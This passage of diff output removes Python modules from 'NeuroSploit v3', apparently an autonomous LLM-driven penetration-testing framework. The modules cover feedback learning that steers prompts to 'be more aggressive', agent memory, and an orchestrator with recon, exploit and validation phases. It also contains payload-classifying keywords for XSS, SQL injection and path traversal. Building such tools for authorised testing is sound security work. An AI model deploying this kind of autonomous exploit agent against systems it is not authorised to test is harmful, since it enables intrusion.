patterns = {
"has_email": '"email":' in body_lower,
"has_name": '"name":' in body_lower,
"has_error": '"error":' in body_lower,
"has_success_false": '"success":false' in body_lower or '"success": false' in body_lower,
"has_login_form": 'type="password"' in body_lower,
"is_empty_array": body.strip() in ("[]", "{}"),
"has_html_form": "<form" in body_lower,
}
for key, present in patterns.items():
if present:
indicators.append(key)
return indicators
def _maybe_learn_pattern(self, record: TestRecord, body: str):
"""Learn a new pattern from a test record if it provides new insight."""
from urllib.parse import urlparse
domain = urlparse(record.target_url).netloc
body_excerpt = body[:500]
# Check if we already know this pattern for this domain
known = any(
p.target_domain == domain
and p.pattern_type == record.pattern_type
and p.vuln_type == record.vuln_type
for p in self.custom_patterns
)
if known:
return
# Learn new domain-specific pattern
pattern = ResponsePattern(
pattern_type=record.pattern_type,
indicators=record.key_indicators,
is_false_positive=not record.is_true_positive,
confidence=0.7, # Start with moderate confidence
example_body=body_excerpt,
vuln_type=record.vuln_type,
target_domain=domain,
timestamp=record.timestamp,
)
self.custom_patterns.append(pattern)
def get_patterns_for_target(self, domain: str) -> List[ResponsePattern]:
"""Get learned patterns for a specific target domain."""
return [
p for p in self.custom_patterns
if p.target_domain == domain
]
def get_false_positive_rate(self, vuln_type: str) -> float:
"""Get the false positive rate for a specific vuln type from historical data."""
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if not type_records:
return 0.5 # No data → assume 50%
fp_count = sum(1 for r in type_records if not r.is_true_positive)
return fp_count / len(type_records)
def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
"""Generate learning context for AI prompts.
Returns a formatted string with learned patterns and statistics
that can be injected into LLM prompts to improve access control testing.
"""
parts = []
# Historical stats
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if type_records:
total = len(type_records)
tp = sum(1 for r in type_records if r.is_true_positive)
fp = total - tp
parts.append(
f"Historical {vuln_type} testing: {total} tests, "
f"{tp} true positives ({100*tp/total:.0f}%), "
f"{fp} false positives ({100*fp/total:.0f}%)"
)
# Most common FP patterns
fp_patterns = [r.pattern_type for r in type_records if not r.is_true_positive]
if fp_patterns:
from collections import Counter
common = Counter(fp_patterns).most_common(3)
pattern_str = ", ".join(f"{p} ({c}x)" for p, c in common)
parts.append(f"Common false positive patterns: {pattern_str}")
# Domain-specific patterns
if domain:
domain_patterns = self.get_patterns_for_target(domain)
if domain_patterns:
for p in domain_patterns[:5]:
status = "FALSE POSITIVE" if p.is_false_positive else "TRUE POSITIVE"
parts.append(
f"Known pattern for {domain}: {p.pattern_type} = {status} "
f"(confidence: {p.confidence:.0%})"
)
# Known application FP patterns
if domain:
for app_name, indicators in self.KNOWN_FP_PATTERNS.items():
if any(i in domain.lower() for i in indicators):
parts.append(
f"WARNING: Target appears to use {app_name}"
f"known for producing false positive access control findings"
)
if not parts:
return ""
return "## Learned Access Control Patterns\n" + "\n".join(f"- {p}" for p in parts)
def get_evaluation_hints(self, vuln_type: str, response_body: str, status: int) -> Dict:
"""Get evaluation hints for a specific response.
Returns hints that can help the validation judge or AI make better decisions.
"""
pattern_type = self._classify_response(response_body, status)
indicators = self._extract_key_indicators(response_body)
# Check against default patterns
matching_default = [
p for p in self.DEFAULT_PATTERNS
if any(i.lower() in response_body.lower() for i in p["indicators"] if i)
]
# Check against learned patterns
matching_learned = [
p for p in self.custom_patterns
if p.vuln_type == vuln_type and p.pattern_type == pattern_type
]
fp_signals = sum(
1 for p in matching_default if p["is_false_positive"]
) + sum(
1 for p in matching_learned if p.is_false_positive
)
tp_signals = sum(
1 for p in matching_default if not p["is_false_positive"]
) + sum(
1 for p in matching_learned if not p.is_false_positive
)
return {
"pattern_type": pattern_type,
"indicators": indicators,
"fp_signals": fp_signals,
"tp_signals": tp_signals,
"likely_false_positive": fp_signals > tp_signals,
"matching_patterns": len(matching_default) + len(matching_learned),
}
@@ -1,357 +0,0 @@
"""
NeuroSploit v3 - Adaptive Learner
Cross-scan adaptive learning from user TP/FP feedback on ALL vulnerability types.
Extends the pattern established by AccessControlLearner to cover the full 100-type spectrum.
The agent learns from user feedback to avoid repeating false positives
and to be more aggressive on confirmed true positive patterns.
"""
import json
import re
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass, field, asdict
from typing import List, Dict, Optional, Tuple
from collections import defaultdict
import logging
logger = logging.getLogger(__name__)
STORAGE_FILE = Path("data/adaptive_learning.json")
MAX_FEEDBACK = 1000
MAX_PATTERNS = 500
FP_THRESHOLD = 3 # After 3 FP feedbacks on same pattern, mark as known FP
@dataclass
class FeedbackRecord:
"""User feedback on a finding."""
vuln_id: str
vuln_type: str
endpoint_pattern: str
param: str = ""
payload_pattern: str = ""
is_true_positive: bool = True
explanation: str = ""
severity: str = "medium"
domain: str = ""
timestamp: str = ""
def __post_init__(self):
if not self.timestamp:
self.timestamp = datetime.utcnow().isoformat()
@dataclass
class LearnedPattern:
"""A pattern learned from multiple feedback records."""
endpoint_pattern: str
vuln_type: str
indicators: List[str] = field(default_factory=list)
is_false_positive: bool = True
confidence: float = 0.5
feedback_count: int = 0
domain: str = ""
explanation_summary: str = ""
last_updated: str = ""
def __post_init__(self):
if not self.last_updated:
self.last_updated = datetime.utcnow().isoformat()
class AdaptiveLearner:
"""Cross-scan adaptive learning from user feedback on all vuln types."""
def __init__(self):
self._feedback: List[FeedbackRecord] = []
self._patterns: Dict[str, List[LearnedPattern]] = {} # vuln_type -> patterns
self._metadata = {"total_feedback": 0, "total_patterns": 0}
self._dirty = False
self._load()
def _load(self):
"""Load persisted learning data."""
if not STORAGE_FILE.exists():
return
try:
data = json.loads(STORAGE_FILE.read_text())
for fb in data.get("feedback", []):
self._feedback.append(FeedbackRecord(**fb))
for vuln_type, patterns in data.get("patterns", {}).items():
self._patterns[vuln_type] = [LearnedPattern(**p) for p in patterns]
self._metadata = data.get("metadata", self._metadata)
except Exception as e:
logger.warning(f"Failed to load adaptive learning data: {e}")
def _save(self):
"""Persist learning data to disk."""
STORAGE_FILE.parent.mkdir(parents=True, exist_ok=True)
data = {
"feedback": [asdict(fb) for fb in self._feedback[-MAX_FEEDBACK:]],
"patterns": {
vt: [asdict(p) for p in patterns[-MAX_PATTERNS:]]
for vt, patterns in self._patterns.items()
},
"metadata": {
"total_feedback": len(self._feedback),
"total_patterns": sum(len(p) for p in self._patterns.values()),
"last_updated": datetime.utcnow().isoformat(),
}
}
try:
STORAGE_FILE.write_text(json.dumps(data, indent=2))
self._dirty = False
except Exception as e:
logger.warning(f"Failed to save adaptive learning data: {e}")
@staticmethod
def _normalize_endpoint(url: str) -> str:
"""Replace IDs, UUIDs, and dates in URLs with {id} for generalization."""
if not url:
return ""
# Replace UUIDs
normalized = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'{id}', url, flags=re.IGNORECASE
)
# Replace numeric IDs in path segments
normalized = re.sub(r'/\d+(?=/|$|\?)', '/{id}', normalized)
# Replace dates
normalized = re.sub(r'\d{4}-\d{2}-\d{2}', '{date}', normalized)
return normalized
def record_feedback(
self,
vuln_id: str,
vuln_type: str,
endpoint: str,
param: str = "",
payload: str = "",
is_tp: bool = True,
explanation: str = "",
severity: str = "medium",
domain: str = "",
):
"""Record user TP/FP feedback on a finding."""
normalized_endpoint = self._normalize_endpoint(endpoint)
record = FeedbackRecord(
vuln_id=vuln_id,
vuln_type=vuln_type,
endpoint_pattern=normalized_endpoint,
param=param,
payload_pattern=self._categorize_payload(payload),
is_true_positive=is_tp,
explanation=explanation[:2000],
severity=severity,
domain=domain,
)
self._feedback.append(record)
self._learn_from_feedback(record)
self._save()
@staticmethod
def _categorize_payload(payload: str) -> str:
"""Categorize a payload into a pattern type."""
if not payload:
return ""
p = payload.lower()
if "<script" in p or "onerror" in p or "onload" in p:
return "script_tag"
if "union" in p and "select" in p:
return "union_select"
if "'" in p or '"' in p:
return "quote_injection"
if "../" in p or "..\\" in p:
return "path_traversal"
if "{{" in p or "${" in p:
return "template_expression"
if "http://" in p or "https://" in p:
return "url_payload"
return "generic"
def _learn_from_feedback(self, record: FeedbackRecord):
"""Learn patterns from accumulated feedback."""
vuln_type = record.vuln_type
if vuln_type not in self._patterns:
self._patterns[vuln_type] = []
# Find existing pattern for this endpoint+vuln_type
existing = None
for pattern in self._patterns[vuln_type]:
if (pattern.endpoint_pattern == record.endpoint_pattern and
pattern.domain == record.domain):
existing = pattern
break
if existing:
existing.feedback_count += 1
existing.last_updated = datetime.utcnow().isoformat()
# Recalculate FP/TP ratio
fb_for_pattern = [
fb for fb in self._feedback
if fb.vuln_type == vuln_type
and fb.endpoint_pattern == record.endpoint_pattern
and fb.domain == record.domain
]
fp_count = sum(1 for fb in fb_for_pattern if not fb.is_true_positive)
tp_count = sum(1 for fb in fb_for_pattern if fb.is_true_positive)
total = fp_count + tp_count
if total > 0:
fp_rate = fp_count / total
existing.is_false_positive = fp_rate >= 0.6
existing.confidence = max(fp_rate, 1.0 - fp_rate)
# Update explanation summary
if record.explanation:
if existing.explanation_summary:
existing.explanation_summary = f"{existing.explanation_summary}; {record.explanation[:200]}"
else:
existing.explanation_summary = record.explanation[:500]
# Truncate if too long
existing.explanation_summary = existing.explanation_summary[:1000]
# Update indicators
if record.param and record.param not in existing.indicators:
existing.indicators.append(record.param)
else:
# Create new pattern
new_pattern = LearnedPattern(
endpoint_pattern=record.endpoint_pattern,
vuln_type=vuln_type,
indicators=[record.param] if record.param else [],
is_false_positive=not record.is_true_positive,
confidence=0.5,
feedback_count=1,
domain=record.domain,
explanation_summary=record.explanation[:500],
)
self._patterns[vuln_type].append(new_pattern)
def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
"""Generate prompt context from learned patterns for a vuln type."""
patterns = self._patterns.get(vuln_type, [])
if not patterns:
return ""
# Filter by domain if specified
relevant = patterns
if domain:
domain_patterns = [p for p in patterns if p.domain == domain]
if domain_patterns:
relevant = domain_patterns
fp_patterns = [p for p in relevant if p.is_false_positive and p.confidence >= 0.6]
tp_patterns = [p for p in relevant if not p.is_false_positive and p.confidence >= 0.6]
if not fp_patterns and not tp_patterns:
return ""
parts = [f"\n## Adaptive Learning Context for {vuln_type}"]
if fp_patterns:
parts.append("### Known FALSE POSITIVE patterns (avoid these):")
for p in fp_patterns[:5]:
parts.append(f"- Endpoint pattern: {p.endpoint_pattern}")
if p.explanation_summary:
parts.append(f" Reason: {p.explanation_summary[:300]}")
if p.indicators:
parts.append(f" Indicators: {', '.join(p.indicators[:5])}")
parts.append(f" Confidence: {p.confidence:.0%} ({p.feedback_count} feedbacks)")
if tp_patterns:
parts.append("### Known TRUE POSITIVE patterns (be more aggressive):")
for p in tp_patterns[:5]:
parts.append(f"- Endpoint pattern: {p.endpoint_pattern}")
if p.explanation_summary:
parts.append(f" Details: {p.explanation_summary[:300]}")
parts.append(f" Confidence: {p.confidence:.0%} ({p.feedback_count} feedbacks)")
return "\n".join(parts)
def get_evaluation_hints(
self, vuln_type: str, endpoint: str, param: str = "", response_body: str = ""
) -> Dict:
"""Get hints for the ValidationJudge based on learned patterns."""
normalized = self._normalize_endpoint(endpoint)
patterns = self._patterns.get(vuln_type, [])
hints = {
"likely_false_positive": False,
"likely_true_positive": False,
"confidence_adjustment": 0,
"reason": "",
"pattern_match": False,
}
for pattern in patterns:
if pattern.endpoint_pattern == normalized:
hints["pattern_match"] = True
if pattern.is_false_positive and pattern.confidence >= 0.7:
hints["likely_false_positive"] = True
hints["confidence_adjustment"] = -int(pattern.confidence * 30)
hints["reason"] = f"Known FP pattern ({pattern.feedback_count} reports): {pattern.explanation_summary[:200]}"
elif not pattern.is_false_positive and pattern.confidence >= 0.7:
hints["likely_true_positive"] = True
hints["confidence_adjustment"] = int(pattern.confidence * 15)
hints["reason"] = f"Known TP pattern ({pattern.feedback_count} reports)"
break
return hints
def should_skip_test(self, vuln_type: str, endpoint: str, param: str = "") -> Tuple[bool, str]:
"""Check if this test should be skipped based on consistent FP feedback."""
normalized = self._normalize_endpoint(endpoint)
patterns = self._patterns.get(vuln_type, [])
for pattern in patterns:
if (pattern.endpoint_pattern == normalized and
pattern.is_false_positive and
pattern.feedback_count >= FP_THRESHOLD and
pattern.confidence >= 0.8):
return True, f"Skipped: {pattern.feedback_count}x FP feedback on {vuln_type} for this endpoint pattern"
return False, ""
def suggest_alternatives(self, vuln_type: str, domain: str = "") -> List[str]:
"""Suggest alternative attack approaches based on TP patterns."""
patterns = self._patterns.get(vuln_type, [])
suggestions = []
tp_patterns = [p for p in patterns if not p.is_false_positive]
if domain:
domain_tp = [p for p in tp_patterns if p.domain == domain]
if domain_tp:
tp_patterns = domain_tp
for p in tp_patterns[:3]:
if p.explanation_summary:
suggestions.append(f"Try approach from confirmed finding: {p.explanation_summary[:200]}")
if p.indicators:
suggestions.append(f"Focus on parameters: {', '.join(p.indicators[:3])}")
return suggestions
def get_stats(self) -> Dict:
"""Get learning statistics."""
stats = {}
for vuln_type, patterns in self._patterns.items():
fp_count = sum(1 for p in patterns if p.is_false_positive)
tp_count = sum(1 for p in patterns if not p.is_false_positive)
total_fb = sum(
1 for fb in self._feedback if fb.vuln_type == vuln_type
)
stats[vuln_type] = {
"fp_patterns": fp_count,
"tp_patterns": tp_count,
"total_feedback": total_fb,
}
return stats
def get_feedback_for_vuln(self, vuln_id: str) -> List[Dict]:
"""Get all feedback records for a specific vulnerability."""
return [asdict(fb) for fb in self._feedback if fb.vuln_id == vuln_id]
-179
View File
@@ -1,179 +0,0 @@
"""
NeuroSploit v3 - Specialist Agent Base Class
Base class for all specialist sub-agents in the multi-agent system.
Inspired by CAI framework's Agent pattern with handoff support,
budget tracking, and shared memory access.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
@dataclass
class AgentResult:
"""Result from a specialist agent execution."""
agent_name: str
status: str = "pending" # pending, running, completed, failed
findings: List[Any] = field(default_factory=list)
data: Dict[str, Any] = field(default_factory=dict)
tasks_completed: int = 0
tokens_used: int = 0
duration: float = 0.0
error: str = ""
handoff_to: str = "" # Agent name to hand off to
handoff_context: Dict = field(default_factory=dict)
class SpecialistAgent:
"""Base class for specialist sub-agents.
Each specialist agent has:
- A name and role description
- Access to shared memory (AgentMemory)
- A token budget allocation
- Handoff capability to transfer work to another agent
- Tool exposure (as_tool) for orchestrator use
"""
def __init__(
self,
name: str,
llm=None,
memory=None,
budget_allocation: float = 0.0,
budget=None,
):
self.name = name
self.llm = llm
self.memory = memory
self.budget_allocation = budget_allocation
self.budget = budget
self.findings: List[Any] = []
self.tasks_completed: int = 0
self.tokens_used: int = 0
self._status = "idle"
self._start_time: float = 0.0
self._cancel_event = asyncio.Event()
async def run(self, context: Dict) -> AgentResult:
"""Main execution loop — override in subclasses.
Args:
context: Dict with target info, recon data, prior findings, etc.
Returns:
AgentResult with findings, data, and optional handoff.
"""
raise NotImplementedError(f"{self.name} must implement run()")
async def execute(self, context: Dict) -> AgentResult:
"""Wrapper that handles timing, error catching, and status updates."""
self._status = "running"
self._start_time = time.time()
self._cancel_event.clear()
result = AgentResult(agent_name=self.name, status="running")
try:
result = await self.run(context)
result.status = "completed"
except asyncio.CancelledError:
result.status = "cancelled"
result.error = "Agent cancelled"
except Exception as e:
result.status = "failed"
result.error = str(e)
logger.error(f"Agent {self.name} failed: {e}")
result.duration = time.time() - self._start_time
result.tokens_used = self.tokens_used
result.tasks_completed = self.tasks_completed
self._status = result.status
return result
def cancel(self):
"""Signal the agent to stop."""
self._cancel_event.set()
@property
def is_cancelled(self) -> bool:
return self._cancel_event.is_set()
async def handoff_to(
self,
target_agent: 'SpecialistAgent',
context: Dict,
) -> AgentResult:
"""Transfer task to another specialist agent.
The receiving agent gets full context from the sender.
"""
handoff_context = {
"from_agent": self.name,
"findings_so_far": self.findings,
"tokens_used": self.tokens_used,
**context,
}
logger.info(f"Handoff: {self.name}{target_agent.name}")
return await target_agent.execute(handoff_context)
def as_tool(self) -> Dict:
"""Expose this agent as a callable tool for the orchestrator.
Returns a dict compatible with LLM tool/function calling.
"""
return {
"name": f"agent_{self.name}",
"description": f"Specialist {self.name} agent",
"parameters": {
"type": "object",
"properties": {
"context": {
"type": "string",
"description": "Task context for the agent",
}
},
},
"handler": self.execute,
}
def get_status(self) -> Dict:
"""Dashboard-friendly status."""
elapsed = time.time() - self._start_time if self._start_time else 0
return {
"name": self.name,
"status": self._status,
"tasks_completed": self.tasks_completed,
"findings_count": len(self.findings),
"tokens_used": self.tokens_used,
"budget_allocation": self.budget_allocation,
"elapsed": round(elapsed, 1),
}
async def _llm_call(self, prompt: str, category: str = "analysis",
estimated_tokens: int = 500) -> Optional[str]:
"""Helper: make an LLM call with budget tracking."""
if not self.llm or not hasattr(self.llm, "generate"):
return None
if self.budget and not self.budget.can_spend(category, estimated_tokens):
logger.debug(f"Agent {self.name}: budget exhausted for {category}")
return None
try:
result = await self.llm.generate(prompt)
if self.budget:
self.budget.record(category, estimated_tokens,
f"agent_{self.name}_{category}")
self.tokens_used += estimated_tokens
return result
except Exception as e:
logger.debug(f"Agent {self.name} LLM call failed: {e}")
return None
-401
View File
@@ -1,401 +0,0 @@
"""
NeuroSploit v3 - Agent Memory Management
Bounded, deduplicated memory architecture for the autonomous agent.
Replaces ad-hoc self.findings / self.tested_payloads with structured,
eviction-aware data stores.
Inspired by XBOW benchmark methodology: every finding must have
real HTTP evidence, duplicates are suppressed, baselines are cached.
"""
import hashlib
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from typing import Dict, List, Optional, Any, Set
from collections import OrderedDict
from urllib.parse import urlparse
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class TestedCombination:
"""Record of a (url, param, vuln_type) test attempt"""
url: str
param: str
vuln_type: str
payloads_used: List[str] = field(default_factory=list)
was_vulnerable: bool = False
tested_at: str = ""
def __post_init__(self):
if not self.tested_at:
self.tested_at = datetime.utcnow().isoformat()
@dataclass
class EndpointFingerprint:
"""Fingerprint of an endpoint's normal response"""
url: str
status_code: int = 0
content_type: str = ""
body_length: int = 0
body_hash: str = ""
server_header: str = ""
powered_by: str = ""
error_patterns: List[str] = field(default_factory=list)
tech_headers: Dict[str, str] = field(default_factory=dict)
fingerprinted_at: str = ""
def __post_init__(self):
if not self.fingerprinted_at:
self.fingerprinted_at = datetime.utcnow().isoformat()
@dataclass
class RejectedFinding:
"""Audit trail for rejected findings"""
finding_hash: str
vuln_type: str
endpoint: str
param: str
reason: str
rejected_at: str = ""
def __post_init__(self):
if not self.rejected_at:
self.rejected_at = datetime.utcnow().isoformat()
# ---------------------------------------------------------------------------
# Speculative language patterns (anti-hallucination)
# ---------------------------------------------------------------------------
SPECULATIVE_PATTERNS = re.compile(
r"\b(could be|might be|may be|theoretically|potentially vulnerable|"
r"possibly|appears to be vulnerable|suggests? (a )?vulnerab|"
r"it is possible|in theory|hypothetically)\b",
re.IGNORECASE
)
# ---------------------------------------------------------------------------
# AgentMemory
# ---------------------------------------------------------------------------
class AgentMemory:
"""
Bounded memory store for the autonomous agent.
All containers have hard caps. When a cap is reached, the oldest 25%
of entries are evicted (LRU-style).
"""
# Capacity limits
MAX_TESTED = 10_000
MAX_BASELINES = 500
MAX_FINGERPRINTS = 500
MAX_CONFIRMED = 200
MAX_REJECTED = 500
# Domain-scoped types: only 1 finding per domain (not per URL)
DOMAIN_SCOPED_TYPES = {
# Infrastructure / headers
"security_headers", "clickjacking", "insecure_http_headers",
"missing_xcto", "missing_csp", "missing_hsts",
"missing_referrer_policy", "missing_permissions_policy",
"cors_misconfig", "insecure_cors_policy", "ssl_issues", "weak_tls_config",
"http_methods", "unrestricted_http_methods",
# Server config
"debug_mode", "debug_mode_enabled", "verbose_error_messages",
"directory_listing", "directory_listing_enabled",
"exposed_admin_panel", "exposed_api_docs", "insecure_cookie_flags",
# Data exposure
"cleartext_transmission", "sensitive_data_exposure",
"information_disclosure", "version_disclosure",
"weak_encryption", "weak_hashing", "weak_random",
# Auth config
"missing_mfa", "weak_password_policy", "weak_password",
# Cloud/API
"graphql_introspection", "rest_api_versioning", "api_rate_limiting",
}
def __init__(self):
# Core stores (OrderedDict for eviction order)
self.tested_combinations: OrderedDict[str, TestedCombination] = OrderedDict()
self.baseline_responses: OrderedDict[str, dict] = OrderedDict()
self.endpoint_fingerprints: OrderedDict[str, EndpointFingerprint] = OrderedDict()
# Findings
self.confirmed_findings: List[Any] = [] # List[Finding] - uses agent's Finding dataclass
self._finding_hashes: Set[str] = set() # fast dedup lookup
# Audit trail
self.rejected_findings: List[RejectedFinding] = []
# Technology stack detected across all endpoints
self.technology_stack: Dict[str, str] = {} # e.g. {"server": "Apache", "x-powered-by": "PHP/8.1"}
# ------------------------------------------------------------------
# Tested-combination tracking
# ------------------------------------------------------------------
@staticmethod
def _test_key(url: str, param: str, vuln_type: str) -> str:
"""Deterministic key for a (url, param, vuln_type) tuple"""
return hashlib.sha256(f"{url}|{param}|{vuln_type}".encode()).hexdigest()
def was_tested(self, url: str, param: str, vuln_type: str) -> bool:
"""Check whether this combination was already tested"""
return self._test_key(url, param, vuln_type) in self.tested_combinations
def record_test(
self, url: str, param: str, vuln_type: str,
payloads: List[str], was_vulnerable: bool = False
):
"""Record a completed test"""
key = self._test_key(url, param, vuln_type)
self.tested_combinations[key] = TestedCombination(
url=url, param=param, vuln_type=vuln_type,
payloads_used=payloads[:10], # store up to 10 payloads
was_vulnerable=was_vulnerable,
)
self._enforce_limit(self.tested_combinations, self.MAX_TESTED)
# ------------------------------------------------------------------
# Baseline caching
# ------------------------------------------------------------------
@staticmethod
def _baseline_key(url: str) -> str:
"""Key for baseline storage (strip query params for reuse)"""
from urllib.parse import urlparse
parsed = urlparse(url)
return f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
def store_baseline(self, url: str, response: dict):
"""Cache a baseline (clean) response for a URL"""
key = self._baseline_key(url)
body = response.get("body", "")
self.baseline_responses[key] = {
"status": response.get("status", 0),
"content_type": response.get("content_type", ""),
"body_length": len(body),
"body_hash": hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
"body": body[:5000], # store first 5k chars for comparison
"headers": response.get("headers", {}),
"fetched_at": datetime.utcnow().isoformat(),
}
self._enforce_limit(self.baseline_responses, self.MAX_BASELINES)
def get_baseline(self, url: str) -> Optional[dict]:
"""Retrieve cached baseline for a URL"""
key = self._baseline_key(url)
baseline = self.baseline_responses.get(key)
if baseline:
# Move to end (mark as recently used)
self.baseline_responses.move_to_end(key)
return baseline
# ------------------------------------------------------------------
# Endpoint fingerprinting
# ------------------------------------------------------------------
def store_fingerprint(self, url: str, response: dict):
"""Extract and store endpoint fingerprint from a response"""
key = self._baseline_key(url)
headers = response.get("headers", {})
body = response.get("body", "")
# Detect error patterns in the body
error_patterns = []
error_regexes = [
r"(?:sql|database|query)\s*(?:error|syntax|exception)",
r"(?:warning|fatal|parse)\s*(?:error|exception)",
r"stack\s*trace",
r"traceback\s*\(most recent",
r"<b>(?:Warning|Fatal error|Notice)</b>",
r"Internal Server Error",
]
body_lower = body.lower() if body else ""
for pat in error_regexes:
if re.search(pat, body_lower):
error_patterns.append(pat)
fp = EndpointFingerprint(
url=url,
status_code=response.get("status", 0),
content_type=response.get("content_type", ""),
body_length=len(body),
body_hash=hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
server_header=headers.get("server", headers.get("Server", "")),
powered_by=headers.get("x-powered-by", headers.get("X-Powered-By", "")),
error_patterns=error_patterns,
tech_headers={
k: v for k, v in headers.items()
if k.lower() in (
"server", "x-powered-by", "x-aspnet-version",
"x-generator", "x-drupal-cache", "x-framework",
)
},
)
self.endpoint_fingerprints[key] = fp
self._enforce_limit(self.endpoint_fingerprints, self.MAX_FINGERPRINTS)
# Update global tech stack
if fp.server_header:
self.technology_stack["server"] = fp.server_header
if fp.powered_by:
self.technology_stack["x-powered-by"] = fp.powered_by
for k, v in fp.tech_headers.items():
self.technology_stack[k.lower()] = v
def get_fingerprint(self, url: str) -> Optional[EndpointFingerprint]:
"""Retrieve fingerprint for a URL"""
key = self._baseline_key(url)
return self.endpoint_fingerprints.get(key)
# ------------------------------------------------------------------
# Finding management (dedup + bounded)
# ------------------------------------------------------------------
@staticmethod
def _finding_hash(finding) -> str:
"""Compute dedup hash for a finding.
For domain-scoped types, uses scheme://netloc instead of full URL
so the same missing header isn't reported per-URL.
"""
vuln_type = finding.vulnerability_type
endpoint = finding.affected_endpoint
if vuln_type in AgentMemory.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{finding.parameter}"
return hashlib.sha256(raw.encode()).hexdigest()
def _find_existing(self, finding) -> Optional[Any]:
"""Find an existing confirmed finding with the same dedup hash."""
fh = self._finding_hash(finding)
if fh not in self._finding_hashes:
return None
for f in self.confirmed_findings:
if self._finding_hash(f) == fh:
return f
return None
def add_finding(self, finding) -> bool:
"""
Add a confirmed finding. Returns False if:
- duplicate (same vuln_type + endpoint + param)
- at capacity
- evidence is missing or speculative
For domain-scoped types, duplicates append the URL to
the existing finding's affected_urls list instead.
"""
fh = self._finding_hash(finding)
# Dedup check — for domain-scoped types, merge URLs
if fh in self._finding_hashes:
if finding.vulnerability_type in self.DOMAIN_SCOPED_TYPES:
existing = self._find_existing(finding)
if existing and hasattr(existing, "affected_urls"):
url = finding.affected_endpoint
if url and url not in existing.affected_urls:
existing.affected_urls.append(url)
return False
# Capacity check
if len(self.confirmed_findings) >= self.MAX_CONFIRMED:
return False
# Evidence quality check
if not finding.evidence and not finding.response:
return False
# Speculative language check
if finding.evidence and SPECULATIVE_PATTERNS.search(finding.evidence):
self.reject_finding(finding, "Speculative language in evidence")
return False
self.confirmed_findings.append(finding)
self._finding_hashes.add(fh)
return True
def reject_finding(self, finding, reason: str):
"""Record a rejected finding for audit"""
self.rejected_findings.append(RejectedFinding(
finding_hash=self._finding_hash(finding),
vuln_type=getattr(finding, "vulnerability_type", "unknown"),
endpoint=getattr(finding, "affected_endpoint", ""),
param=getattr(finding, "parameter", ""),
reason=reason,
))
if len(self.rejected_findings) > self.MAX_REJECTED:
# Evict oldest 25%
cut = self.MAX_REJECTED // 4
self.rejected_findings = self.rejected_findings[cut:]
def has_finding_for(self, vuln_type: str, endpoint: str, param: str = "") -> bool:
"""Check if a confirmed finding already exists for this combo.
Uses domain-scoped key for domain-scoped types.
"""
if vuln_type in self.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{param}"
fh = hashlib.sha256(raw.encode()).hexdigest()
return fh in self._finding_hashes
# ------------------------------------------------------------------
# Eviction helper
# ------------------------------------------------------------------
@staticmethod
def _enforce_limit(od: OrderedDict, limit: int):
"""Evict oldest 25% when limit is exceeded"""
if len(od) <= limit:
return
to_remove = limit // 4
for _ in range(to_remove):
od.popitem(last=False) # pop oldest
# ------------------------------------------------------------------
# Stats / introspection
# ------------------------------------------------------------------
def stats(self) -> dict:
"""Return memory usage statistics"""
return {
"tested_combinations": len(self.tested_combinations),
"baseline_responses": len(self.baseline_responses),
"endpoint_fingerprints": len(self.endpoint_fingerprints),
"confirmed_findings": len(self.confirmed_findings),
"rejected_findings": len(self.rejected_findings),
"technology_stack": dict(self.technology_stack),
"limits": {
"tested": self.MAX_TESTED,
"baselines": self.MAX_BASELINES,
"fingerprints": self.MAX_FINGERPRINTS,
"confirmed": self.MAX_CONFIRMED,
"rejected": self.MAX_REJECTED,
},
}
def clear(self):
"""Reset all memory stores"""
self.tested_combinations.clear()
self.baseline_responses.clear()
self.endpoint_fingerprints.clear()
self.confirmed_findings.clear()
self._finding_hashes.clear()
self.rejected_findings.clear()
self.technology_stack.clear()
@@ -1,342 +0,0 @@
"""
NeuroSploit v3 - Multi-Agent Orchestrator
Coordinates specialist agents in a CAI-inspired pattern:
Phase 1: Parallel — ReconAgent + CVEHunterAgent
Phase 2: Sequential — ExploitAgent (consumes recon output)
Phase 3: Parallel — ValidatorAgent + ReportAgent
Manages handoffs, shared memory, and progress tracking.
Enabled via ENABLE_MULTI_AGENT=true in .env.
"""
import asyncio
import logging
import time
from typing import Any, Dict, List, Optional
from core.agent_base import SpecialistAgent, AgentResult
logger = logging.getLogger(__name__)
# Lazy imports
_specialist = None
def _get_specialist_module():
global _specialist
if _specialist is None:
try:
from core import specialist_agents
_specialist = specialist_agents
except ImportError:
_specialist = False
return _specialist if _specialist else None
class AgentOrchestrator:
"""Coordinates specialist agents with handoff routing.
Three execution phases:
1. Intelligence gathering (Recon + CVE Hunter in parallel)
2. Exploitation (ExploitAgent with enriched recon)
3. Validation and reporting (Validator + Reporter in parallel)
Handoff rules route output from one agent as input to the next.
Shared memory allows agents to see each other's findings.
"""
def __init__(
self,
llm=None,
memory=None,
budget=None,
request_engine=None,
config: Dict = None,
):
self.llm = llm
self.memory = memory
self.budget = budget
self.request_engine = request_engine
self.config = config or {}
self._agents: Dict[str, SpecialistAgent] = {}
self._results: Dict[str, AgentResult] = {}
self._phase = "idle"
self._start_time: float = 0.0
self._cancel_event = asyncio.Event()
self._progress_callback = None
self._init_agents()
def _init_agents(self):
"""Initialize specialist agents with budget allocations."""
spec = _get_specialist_module()
if not spec:
logger.warning("Specialist agents module not available")
return
budget_splits = self.config.get("budget_splits", {
"recon": 0.20,
"exploit": 0.35,
"validator": 0.20,
"cve_hunter": 0.10,
"reporter": 0.15,
})
self._agents = {
"recon": spec.ReconAgent(
llm=self.llm, memory=self.memory,
